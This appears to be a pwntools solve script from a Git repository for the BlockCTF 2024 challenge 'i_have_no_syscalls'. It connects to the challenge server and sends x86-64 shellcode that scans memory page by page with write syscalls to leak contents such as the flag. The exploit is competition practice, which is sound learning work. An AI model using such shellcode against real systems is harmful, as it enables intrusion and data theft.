jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
ctfs/blockctf_2024/i_have_no_syscalls/a.py
T
jc c71564b667 solve script
2024-11-15 23:48:35 +03:00

36 lines
472 B
Python
Raw Permalink Blame History

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./ihnsaims", checksec=False)
# r = process("./ihnsaims flag{fake_flag}", shell=True)
r = remote("54.85.45.101", 8002)
# funcs
s = lambda a: r.sendafter(b"!\n", a)
# write
s(b"1")
# shellcode
sc = """
lea r12, [rdx]
a:
lea r12, [r12+0x1000]
mov rdi, 1
mov rsi, r12
mov rdx, 0x1000
mov rax, 1
syscall
cmp rax, -14
je a
jne b
b:
xor rdi, rdi
mov rax, 231
syscall
"""
sc = asm(sc)
s(sc)
r.interactive()
Reference in New Issue View Git Blame Copy Permalink